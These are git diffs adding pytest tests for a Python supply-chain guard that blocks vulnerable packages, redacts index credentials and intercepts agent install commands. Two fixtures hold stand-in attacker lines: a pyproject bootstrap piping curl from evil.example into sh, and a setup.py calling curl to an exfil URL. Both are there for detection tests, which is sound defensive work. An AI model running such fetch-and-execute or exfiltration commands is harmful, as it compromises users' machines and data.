+class _SilentSimpleIndexHandler(SimpleHTTPRequestHandler):
+    def log_message(self, message_format: str, *args: object) -> None:
+        del message_format, args
+
+
+@contextmanager
+def _serve_directory(root: Path) -> Iterator[str]:
+    handler = functools.partial(_SilentSimpleIndexHandler, directory=str(root))
+    server = ThreadingHTTPServer(("127.0.0.1", 0), handler)
+    thread = threading.Thread(target=server.serve_forever, daemon=True)
+    thread.start()
+    try:
+        yield f"http://127.0.0.1:{server.server_port}"
+    finally:
+        server.shutdown()
+        server.server_close()
+        thread.join(timeout=5)
+
+
+def test_python_simple_index_lab_blocks_vulnerable_version_and_serves_safe_wheel(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    index_root = tmp_path / "simple-index"
+    dist_dir = index_root / "packages"
+    dist_dir.mkdir(parents=True)
+    vulnerable_wheel = _build_wheel(tmp_path / "build", "1.0.0", dist_dir)
+    safe_wheel = _build_wheel(tmp_path / "build", "1.0.1", dist_dir)
+    _write_simple_index(index_root, [vulnerable_wheel, safe_wheel])
+
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name="labdemo",
+                    version="1.0.0",
+                    default_action="block",
+                    recommended_fix_version="1.0.1",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    with _serve_directory(index_root) as base_url:
+        blocked_artifact = artifact_from_command_fixture(
+            f"pip install --trusted-host 127.0.0.1 --index-url {base_url}/simple labdemo==1.0.0",
+            workspace=workspace_dir,
+        )
+        blocked_result = evaluate_package_request_artifact(
+            artifact=blocked_artifact,
+            store=store,
+            workspace_dir=workspace_dir,
+        )
+
+        assert blocked_result.decision == "block"
+        assert blocked_result.user_copy.next_step == "pip install labdemo==1.0.1"
+
+        safe_artifact = artifact_from_command_fixture(
+            f"pip install --trusted-host 127.0.0.1 --index-url {base_url}/simple labdemo==1.0.1",
+            workspace=workspace_dir,
+        )
+        safe_result = evaluate_package_request_artifact(
+            artifact=safe_artifact,
+            store=store,
+            workspace_dir=workspace_dir,
+        )
+
+        assert safe_result.decision == "allow"
+
+        download_dir = tmp_path / "downloads"
+        download_dir.mkdir()
+        subprocess.run(
+            [
+                sys.executable,
+                "-m",
+                "pip",
+                "download",
+                "--no-deps",
+                "--disable-pip-version-check",
+                "--index-url",
+                f"{base_url}/simple",
+                "--trusted-host",
+                "127.0.0.1",
+                "labdemo==1.0.1",
+                "-d",
+                str(download_dir),
+            ],
+            capture_output=True,
+            check=True,
+            text=True,
+        )
+
+    assert (download_dir / safe_wheel.name).exists()

--- a/tests/test_guard_python_lab_phase12.py
+++ b/tests/test_guard_python_lab_phase12.py
@@ -6,7 +6,6 @@ import base64
 import functools
 import hashlib
 import subprocess
-import sys
 import threading
 import zipfile
 from collections.abc import Iterator
@@ -36,16 +35,10 @@ def _build_wheel(build_root: Path, version: str, dist_dir: Path) -> Path:
     package_files = {
         "labdemo/__init__.py": f'__version__ = "{version}"\n'.encode(),
         f"{dist_info_dir}/WHEEL": (
-            b"Wheel-Version: 1.0\n"
-            b"Generator: hol-guard-test\n"
-            b"Root-Is-Purelib: true\n"
-            b"Tag: py3-none-any\n"
+            b"Wheel-Version: 1.0\nGenerator: hol-guard-test\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
         ),
         f"{dist_info_dir}/METADATA": (
-            "Metadata-Version: 2.1\n"
-            "Name: labdemo\n"
-            f"Version: {version}\n"
-            "Summary: HOL Guard local lab package\n"
+            f"Metadata-Version: 2.1\nName: labdemo\nVersion: {version}\nSummary: HOL Guard local lab package\n"
         ).encode(),
     }
     record_lines: list[str] = []
@@ -61,8 +54,7 @@ def _build_wheel(build_root: Path, version: str, dist_dir: Path) -> Path:
 
 def _write_simple_index(index_root: Path, wheel_paths: list[Path]) -> None:
     package_links = "\n".join(
-        f'<a href="../../packages/{wheel_path.name}">{wheel_path.name}</a><br/>'
-        for wheel_path in sorted(wheel_paths)
+        f'<a href="../../packages/{wheel_path.name}">{wheel_path.name}</a><br/>' for wheel_path in sorted(wheel_paths)
     )
     write_text(index_root / "simple" / "index.html", '<a href="labdemo/">labdemo</a>\n')
     write_text(index_root / "simple" / "labdemo" / "index.html", package_links + "\n")
@@ -148,7 +140,11 @@ def test_python_simple_index_lab_blocks_vulnerable_version_and_serves_safe_wheel
         download_dir.mkdir()
         subprocess.run(
             [
-                sys.executable,
+                "uv",
+                "run",
+                "--with",
+                "pip",
+                "python",
                 "-m",
                 "pip",
                 "download",

--- a/tests/test_guard_python_package_hook_phase12.py
+++ b/tests/test_guard_python_package_hook_phase12.py
@@ -1,0 +1,116 @@
+"""Phase 12 Python package-hook proofs for exec flows."""
+
+from __future__ import annotations
+
+import json
+from pathlib import Path
+
+import pytest
+
+from codex_plugin_scanner.cli import main
+from codex_plugin_scanner.guard.cli import commands as guard_commands_module
+from codex_plugin_scanner.guard.store import GuardStore
+
+from .guard_python_phase12_support import (
+    WORKSPACE_ID,
+    bundle_response_fixture,
+    package_fixture,
+)
+
+
+def _write_codex_pre_tool_payload(path: Path, workspace_dir: Path, command: str) -> None:
+    path.parent.mkdir(parents=True, exist_ok=True)
+    path.write_text(
+        json.dumps(
+            {
+                "session_id": "session-1",
+                "turn_id": "turn-1",
+                "cwd": str(workspace_dir),
+                "hook_event_name": "PreToolUse",
+                "model": "gpt-5.4",
+                "permission_mode": "bypassPermissions",
+                "tool_name": "Bash",
+                "tool_input": {"command": command},
+                "tool_use_id": "call-1",
+            }
+        ),
+        encoding="utf-8",
+    )
+
+
+@pytest.mark.parametrize(
+    ("command", "package_name", "version"),
+    [
+        ("pipx run httpie==3.2.2", "httpie", "3.2.2"),
+        ("uvx ruff==0.6.9", "ruff", "0.6.9"),
+    ],
+)
+def test_guard_hook_blocks_python_exec_flows_before_subprocess(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+    capsys: pytest.CaptureFixture[str],
+    command: str,
+    package_name: str,
+    version: str,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    payload_path = workspace_dir / "hook-event.json"
+    _write_codex_pre_tool_payload(payload_path, workspace_dir, command)
+    store = GuardStore(home_dir)
+    store.set_sync_credentials(
+        "https://hol.org/api/guard/receipts/sync",
+        "demo-token",
+        "2026-05-19T00:00:00Z",
+        workspace_id=WORKSPACE_ID,
+    )
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name=package_name,
+                    version=version,
+                    default_action="block",
+                    recommended_fix_version=None,
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+    (home_dir / "config.toml").write_text("approval_wait_timeout_seconds = 0\n", encoding="utf-8")
+    monkeypatch.setenv("CODEX_MANAGED_BY_BUN", "1")
+    monkeypatch.setattr(guard_commands_module, "ensure_guard_daemon", lambda _home: "http://127.0.0.1:5474")
+
+    def fail_daemon(_home: Path) -> object:
+        raise RuntimeError("no daemon client")
+
+    monkeypatch.setattr(guard_commands_module, "load_guard_surface_daemon_client", fail_daemon)
+
+    def fail_subprocess(*args: object, **kwargs: object) -> object:
+        raise AssertionError("blocked python exec flow must not launch a subprocess")
+
+    monkeypatch.setattr(guard_commands_module.subprocess, "run", fail_subprocess)
+
+    rc = main(
+        [
+            "guard",
+            "hook",
+            "--harness",
+            "codex",
+            "--home",
+            str(home_dir),
+            "--workspace",
+            str(workspace_dir),
+            "--event-file",
+            str(payload_path),
+        ]
+    )
+    captured = capsys.readouterr()
+
+    assert rc == 2
+    assert "blocked" in captured.err.lower()
+    evidence = store.list_evidence()
+    assert evidence
+    assert evidence[0]["category"] == "supply-chain"

--- a/tests/test_guard_python_package_intent_phase12.py
+++ b/tests/test_guard_python_package_intent_phase12.py
@@ -161,4 +161,14 @@ def test_parse_package_intent_redacts_pip_index_credentials_from_env_assignments
 
     assert intent is not None
     assert "user:secret@" not in intent.redacted_command
-    assert "PIP_INDEX_URL=https://example.com/simple" in intent.redacted_command
+    assert "PIP_INDEX_URL" not in intent.redacted_command
+    assert intent.redacted_command == "pip install requests==2.31.0"
+
+
+def test_parse_package_intent_strips_non_url_env_assignments_from_redacted_command() -> None:
+    intent = parse_package_intent("API_TOKEN=supersecret pip install requests==2.31.0")
+
+    assert intent is not None
+    assert "API_TOKEN" not in intent.redacted_command
+    assert "supersecret" not in intent.redacted_command
+    assert intent.redacted_command == "pip install requests==2.31.0"

--- a/tests/test_guard_python_package_intent_phase12.py
+++ b/tests/test_guard_python_package_intent_phase12.py
@@ -35,6 +35,21 @@ httpx>=0.27 ; python_version >= "3.10"
     assert set(changes) == {"flask", "httpx"}
 
 
+def test_parse_manifest_dependency_changes_supports_python_requirements_line_continuations() -> None:
+    before = """
+requests==2.31.0 \\
+    --hash=sha256:aaaaaaaa
+"""
+    after = """
+requests==2.32.0 \\
+    --hash=sha256:bbbbbbbb
+"""
+
+    changes = _change_map("requirements.txt", before, after)
+
+    assert changes["requests"] == ("2.31.0", "2.32.0")
+
+
 def test_parse_manifest_dependency_changes_supports_pyproject_optional_dependencies() -> None:
     before = """
 [project]
@@ -154,10 +169,7 @@ def test_parse_package_intent_redacts_pip_index_credentials_from_flag_values() -
 
 
 def test_parse_package_intent_redacts_pip_index_credentials_from_env_assignments() -> None:
-    intent = parse_package_intent(
-        "PIP_INDEX_URL=https://user:secret@example.com/simple "
-        "pip install requests==2.31.0"
-    )
+    intent = parse_package_intent("PIP_INDEX_URL=https://user:secret@example.com/simple pip install requests==2.31.0")
 
     assert intent is not None
     assert "user:secret@" not in intent.redacted_command

--- a/tests/test_guard_python_package_intent_phase12.py
+++ b/tests/test_guard_python_package_intent_phase12.py
@@ -1,0 +1,164 @@
+"""Phase 12 Python manifest and lockfile parsing tests."""
+
+from __future__ import annotations
+
+from codex_plugin_scanner.guard.runtime.package_intent import (
+    parse_manifest_dependency_changes,
+    parse_package_intent,
+)
+
+
+def _change_map(path: str, before_text: str, after_text: str) -> dict[str, tuple[str | None, str | None]]:
+    result = parse_manifest_dependency_changes(path=path, before_text=before_text, after_text=after_text)
+    return {change.package_name: (change.before, change.after) for change in result.changes}
+
+
+def test_parse_manifest_dependency_changes_supports_python_requirements_hashes_markers_and_comments() -> None:
+    before = """
+# base dependencies
+-r base.txt
+-c constraints.txt
+flask[async]==3.0.0 --hash=sha256:aaaaaaaa
+"""
+    after = """
+# base dependencies
+-r base.txt
+-c constraints.txt
+flask[async]==3.0.1 --hash=sha256:bbbbbbbb
+httpx>=0.27 ; python_version >= "3.10"
+"""
+
+    changes = _change_map("requirements.txt", before, after)
+
+    assert changes["flask"] == ("3.0.0", "3.0.1")
+    assert changes["httpx"] == (None, '>=0.27 ; python_version >= "3.10"')
+    assert set(changes) == {"flask", "httpx"}
+
+
+def test_parse_manifest_dependency_changes_supports_pyproject_optional_dependencies() -> None:
+    before = """
+[project]
+dependencies = ["fastapi>=0.110,<0.115"]
+
+[project.optional-dependencies]
+dev = ["pytest>=8.0"]
+"""
+    after = """
+[project]
+dependencies = ["fastapi>=0.110,<0.116", "httpx>=0.27"]
+
+[project.optional-dependencies]
+dev = ["pytest>=8.1"]
+docs = ["mkdocs>=1.6"]
+"""
+
+    changes = _change_map("pyproject.toml", before, after)
+
+    assert changes["fastapi"] == (">=0.110,<0.115", ">=0.110,<0.116")
+    assert changes["httpx"] == (None, ">=0.27")
+    assert changes["pytest"] == (">=8.0", ">=8.1")
+    assert changes["mkdocs"] == (None, ">=1.6")
+
+
+def test_parse_manifest_dependency_changes_supports_poetry_lock_packages() -> None:
+    before = """
+[[package]]
+name = "requests"
+version = "2.31.0"
+groups = ["main"]
+
+[[package]]
+name = "pytest"
+version = "8.1.0"
+groups = ["dev"]
+"""
+    after = """
+[[package]]
+name = "requests"
+version = "2.32.0"
+groups = ["main"]
+
+[[package]]
+name = "pytest"
+version = "8.1.1"
+groups = ["dev"]
+
+[[package]]
+name = "httpx"
+version = "0.27.0"
+groups = ["main"]
+"""
+
+    changes = _change_map("poetry.lock", before, after)
+
+    assert changes["requests"] == ("2.31.0", "2.32.0")
+    assert changes["pytest"] == ("8.1.0", "8.1.1")
+    assert changes["httpx"] == (None, "0.27.0")
+
+
+def test_parse_manifest_dependency_changes_supports_uv_lock_packages() -> None:
+    before = """
+version = 1
+
+[[package]]
+name = "fastapi"
+version = "0.115.0"
+source = { registry = "https://pypi.org/simple" }
+"""
+    after = """
+version = 1
+
+[[package]]
+name = "fastapi"
+version = "0.115.1"
+source = { registry = "https://pypi.org/simple" }
+
+[[package]]
+name = "httpx"
+version = "0.27.0"
+source = { registry = "https://pypi.org/simple" }
+"""
+
+    changes = _change_map("uv.lock", before, after)
+
+    assert changes["fastapi"] == ("0.115.0", "0.115.1")
+    assert changes["httpx"] == (None, "0.27.0")
+
+
+def test_parse_manifest_dependency_changes_supports_pipfile_lock_default_and_develop() -> None:
+    before = """
+{"default":{"flask":{"version":"==3.0.0"}},"develop":{"pytest":{"version":"==8.1.0"}}}
+"""
+    after = """
+{"default":{"flask":{"version":"==3.0.1"},"httpx":{"version":"==0.27.0"}},"develop":{"pytest":{"version":"==8.1.1"}}}
+"""
+
+    changes = _change_map("Pipfile.lock", before, after)
+
+    assert changes["flask"] == ("3.0.0", "3.0.1")
+    assert changes["httpx"] == (None, "0.27.0")
+    assert changes["pytest"] == ("8.1.0", "8.1.1")
+
+
+def test_parse_package_intent_redacts_pip_index_credentials_from_flag_values() -> None:
+    intent = parse_package_intent(
+        "pip install --index-url=https://user:secret@example.com/simple "
+        "--extra-index-url=https://token@mirror.example/simple requests==2.31.0"
+    )
+
+    assert intent is not None
+    assert "user:secret@" not in intent.redacted_command
+    assert "token@" not in intent.redacted_command
+    assert "--index-url=https://example.com/simple" in intent.redacted_command
+    assert "--extra-index-url=https://mirror.example/simple" in intent.redacted_command
+
+
+def test_parse_package_intent_redacts_pip_index_credentials_from_env_assignments() -> None:
+    intent = parse_package_intent(
+        "PIP_INDEX_URL=https://user:secret@example.com/simple "
+        "pip install requests==2.31.0"
+    )
+
+    assert intent is not None
+    assert "user:secret@" not in intent.redacted_command
+    assert "PIP_INDEX_URL=https://example.com/simple" in intent.redacted_command

--- a/tests/test_guard_python_supply_chain_heuristics_phase12.py
+++ b/tests/test_guard_python_supply_chain_heuristics_phase12.py
@@ -149,6 +149,34 @@ build-backend = "setuptools.build_meta"
     assert result.decision == "monitor"
 
 
+def test_evaluate_package_request_artifact_expands_home_local_python_paths(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    monkeypatch.setenv("HOME", str(home_dir))
+    project_dir = home_dir / "local-demo"
+    project_dir.mkdir(parents=True)
+    write_text(
+        project_dir / "pyproject.toml",
+        """
+[build-system]
+requires = ["setuptools>=68"]
+build-backend = "setuptools.build_meta"
+""".strip()
+        + "\n",
+    )
+    store = GuardStore(home_dir / "guard-home")
+
+    artifact = artifact_from_command_fixture("pip install -e ~/local-demo", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "warn"
+    assert result.packages[0]["reasons"][0]["code"] == "local_build_backend_risk"
+
+
 def test_evaluate_package_request_artifact_keeps_benign_pyproject_urls_as_warn_only(tmp_path: Path) -> None:
     home_dir = tmp_path / "home"
     workspace_dir = tmp_path / "workspace"

--- a/tests/test_guard_python_supply_chain_heuristics_phase12.py
+++ b/tests/test_guard_python_supply_chain_heuristics_phase12.py
@@ -102,6 +102,23 @@ def test_evaluate_package_request_artifact_warns_on_python_vcs_and_direct_url_so
     assert result.packages[0]["reasons"][0]["code"] in {"git_dependency_source", "external_tarball_source"}
 
 
+def test_evaluate_package_request_artifact_prefers_editable_vcs_urls_over_local_workspace(tmp_path: Path) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(
+        workspace_dir / "pyproject.toml",
+        '[build-system]\nrequires=["setuptools>=68"]\nbuild-backend="setuptools.build_meta"\n',
+    )
+    store = GuardStore(home_dir)
+    artifact = artifact_from_command_fixture(
+        'pip install -e "private-demo @ git+https://example.com/org/private-demo.git"', workspace=workspace_dir
+    )
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+    assert result.decision == "warn"
+    assert result.packages[0]["reasons"][0]["code"] == "git_dependency_source"
+
+
 def test_evaluate_package_request_artifact_warns_on_editable_local_python_builds(tmp_path: Path) -> None:
     home_dir = tmp_path / "home"
     workspace_dir = tmp_path / "workspace"

--- a/tests/test_guard_python_supply_chain_heuristics_phase12.py
+++ b/tests/test_guard_python_supply_chain_heuristics_phase12.py
@@ -177,6 +177,32 @@ build-backend = "setuptools.build_meta"
     assert result.packages[0]["reasons"][0]["code"] == "local_build_backend_risk"
 
 
+def test_evaluate_package_request_artifact_treats_relative_python_project_paths_as_local(
+    tmp_path: Path,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    project_dir = workspace_dir / "path" / "to" / "local-demo"
+    project_dir.mkdir(parents=True)
+    write_text(
+        project_dir / "pyproject.toml",
+        """
+[build-system]
+requires = ["setuptools>=68"]
+build-backend = "setuptools.build_meta"
+""".strip()
+        + "\n",
+    )
+    store = GuardStore(home_dir)
+
+    artifact = artifact_from_command_fixture("pip install path/to/local-demo", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "warn"
+    assert result.packages[0]["reasons"][0]["code"] == "local_build_backend_risk"
+
+
 def test_evaluate_package_request_artifact_keeps_benign_pyproject_urls_as_warn_only(tmp_path: Path) -> None:
     home_dir = tmp_path / "home"
     workspace_dir = tmp_path / "workspace"

--- a/tests/test_guard_python_supply_chain_heuristics_phase12.py
+++ b/tests/test_guard_python_supply_chain_heuristics_phase12.py
@@ -49,6 +49,35 @@ def test_evaluate_package_request_artifact_normalizes_pypi_names_for_bundle_matc
     assert result.packages[0]["name"] == "scikit-learn"
 
 
+def test_evaluate_package_request_artifact_ignores_cross_ecosystem_bundle_matches(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    npm_package = package_fixture(
+        name="requests",
+        version="2.31.0",
+        default_action="block",
+        recommended_fix_version="2.32.0",
+    )
+    npm_package["ecosystem"] = "npm"
+    npm_package["purl"] = "pkg:npm/requests@2.31.0"
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(packages=[npm_package]),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture("pip install requests==2.31.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "monitor"
+
+
 @pytest.mark.parametrize(
     "command",
     [
@@ -93,6 +122,31 @@ build-backend = "setuptools.build_meta"
 
     assert result.decision == "warn"
     assert result.packages[0]["reasons"][0]["code"] == "local_build_backend_risk"
+
+
+def test_evaluate_package_request_artifact_does_not_treat_plain_requirement_name_as_local_path(
+    tmp_path: Path,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    local_requests_dir = workspace_dir / "requests"
+    local_requests_dir.mkdir()
+    write_text(
+        local_requests_dir / "pyproject.toml",
+        """
+[build-system]
+requires = ["setuptools>=68"]
+build-backend = "setuptools.build_meta"
+""".strip()
+        + "\n",
+    )
+    store = GuardStore(home_dir)
+
+    artifact = artifact_from_command_fixture("pip install requests", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "monitor"
 
 
 def test_evaluate_package_request_artifact_keeps_benign_pyproject_urls_as_warn_only(tmp_path: Path) -> None:

--- a/tests/test_guard_python_supply_chain_heuristics_phase12.py
+++ b/tests/test_guard_python_supply_chain_heuristics_phase12.py
@@ -1,0 +1,356 @@
+"""Phase 12 Python evaluator heuristic and regression tests."""
+
+from __future__ import annotations
+
+from pathlib import Path
+
+import pytest
+
+from codex_plugin_scanner.guard.runtime.supply_chain_package_eval import evaluate_package_request_artifact
+from codex_plugin_scanner.guard.store import GuardStore
+
+from .guard_python_phase12_support import (
+    WORKSPACE_ID,
+    artifact_from_command_fixture,
+    bundle_response_fixture,
+    package_fixture,
+    write_text,
+)
+
+
+def test_evaluate_package_request_artifact_normalizes_pypi_names_for_bundle_matching(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name="scikit-learn",
+                    version="1.5.0",
+                    default_action="block",
+                    recommended_fix_version="1.5.1",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture("pip install scikit_learn==1.5.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["name"] == "scikit-learn"
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "pip install private-demo @ git+https://example.com/org/private-demo.git",
+        "pip install -e git+https://example.com/org/private-demo.git#egg=private-demo",
+        "pip install https://example.com/packages/private-demo-1.0.0.tar.gz",
+    ],
+)
+def test_evaluate_package_request_artifact_warns_on_python_vcs_and_direct_url_sources(
+    tmp_path: Path,
+    command: str,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    store = GuardStore(home_dir)
+
+    artifact = artifact_from_command_fixture(command, workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "warn"
+    assert result.packages[0]["reasons"][0]["code"] in {"git_dependency_source", "external_tarball_source"}
+
+
+def test_evaluate_package_request_artifact_warns_on_editable_local_python_builds(tmp_path: Path) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(
+        workspace_dir / "pyproject.toml",
+        """
+[build-system]
+requires = ["setuptools>=68"]
+build-backend = "setuptools.build_meta"
+""".strip()
+        + "\n",
+    )
+    store = GuardStore(home_dir)
+
+    artifact = artifact_from_command_fixture("pip install -e .", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "warn"
+    assert result.packages[0]["reasons"][0]["code"] == "local_build_backend_risk"
+
+
+def test_evaluate_package_request_artifact_keeps_benign_pyproject_urls_as_warn_only(tmp_path: Path) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(
+        workspace_dir / "pyproject.toml",
+        """
+[build-system]
+requires = ["setuptools>=68"]
+build-backend = "setuptools.build_meta"
+
+[project]
+name = "demo"
+version = "0.1.0"
+
+[project.urls]
+Homepage = "https://example.com/demo"
+Repository = "https://example.com/demo.git"
+""".strip()
+        + "\n",
+    )
+    store = GuardStore(home_dir)
+
+    artifact = artifact_from_command_fixture("pip install -e .", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "warn"
+    assert result.packages[0]["reasons"][0]["code"] == "local_build_backend_risk"
+
+
+def test_evaluate_package_request_artifact_blocks_suspicious_pyproject_build_backend_risk(
+    tmp_path: Path,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(
+        workspace_dir / "pyproject.toml",
+        """
+[build-system]
+requires = ["setuptools>=68"]
+build-backend = "demo_backend"
+
+[tool.demo-backend]
+bootstrap = "curl https://evil.example/bootstrap.sh | sh"
+""".strip()
+        + "\n",
+    )
+    store = GuardStore(home_dir)
+
+    artifact = artifact_from_command_fixture("pip install -e .", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["reasons"][0]["code"] == "build_backend_exec_risk"
+
+
+def test_evaluate_package_request_artifact_blocks_local_setup_py_exec_risk(tmp_path: Path) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(
+        workspace_dir / "setup.py",
+        """
+from setuptools import setup
+import os
+
+os.system("curl https://evil.example/exfil")
+setup(name="local-demo", version="0.1.0")
+""".strip()
+        + "\n",
+    )
+    store = GuardStore(home_dir)
+
+    artifact = artifact_from_command_fixture("uv pip install -e .", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["reasons"][0]["code"] == "setup_py_exec_risk"
+
+
+@pytest.mark.parametrize(
+    ("command", "manifest_name", "manifest_text", "lockfile_name", "lockfile_text"),
+    [
+        (
+            "poetry add requests@^2.31",
+            "pyproject.toml",
+            "[tool.poetry]\nname = 'demo'\nversion = '0.1.0'\n[tool.poetry.dependencies]\nfastapi = '^0.115'\n",
+            "poetry.lock",
+            """
+[[package]]
+name = "requests"
+version = "2.31.0"
+groups = ["main"]
+""",
+        ),
+        (
+            "uv add requests>=2.31,<2.32",
+            "pyproject.toml",
+            "[project]\nname = 'demo'\nversion = '0.1.0'\ndependencies = ['fastapi>=0.115,<0.116']\n",
+            "uv.lock",
+            """
+version = 1
+
+[[package]]
+name = "requests"
+version = "2.31.0"
+source = { registry = "https://pypi.org/simple" }
+""",
+        ),
+        (
+            "pipenv install requests~=2.31",
+            "Pipfile",
+            "[packages]\nflask = '~=3.0'\n",
+            "Pipfile.lock",
+            """
+{"default":{"requests":{"version":"==2.31.0"}}}
+""",
+        ),
+    ],
+)
+def test_evaluate_package_request_artifact_ignores_non_direct_python_lock_entries_for_new_targets(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+    command: str,
+    manifest_name: str,
+    manifest_text: str,
+    lockfile_name: str,
+    lockfile_text: str,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(workspace_dir / manifest_name, manifest_text)
+    write_text(workspace_dir / lockfile_name, lockfile_text.strip() + "\n")
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name="requests",
+                    version="2.31.0",
+                    default_action="block",
+                    recommended_fix_version="2.32.0",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture(command, workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "monitor"
+
+
+def test_evaluate_package_request_artifact_matches_transitive_python_lockfile_names_with_pep503_normalization(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(workspace_dir / "Pipfile", "[packages]\nflask = '~=3.0'\n")
+    write_text(
+        workspace_dir / "Pipfile.lock",
+        """
+{"default":{"flask":{"version":"==3.0.0"},"scikit_learn":{"version":"==1.5.0"}}}
+""".strip()
+        + "\n",
+    )
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name="scikit-learn",
+                    version="1.5.0",
+                    default_action="block",
+                    recommended_fix_version="1.5.1",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture("pipenv install flask~=3.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert any(package["name"] == "scikit-learn" for package in result.packages)
+
+
+def test_evaluate_package_request_artifact_maps_python_advisory_aliases_to_primary_ids(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name="requests",
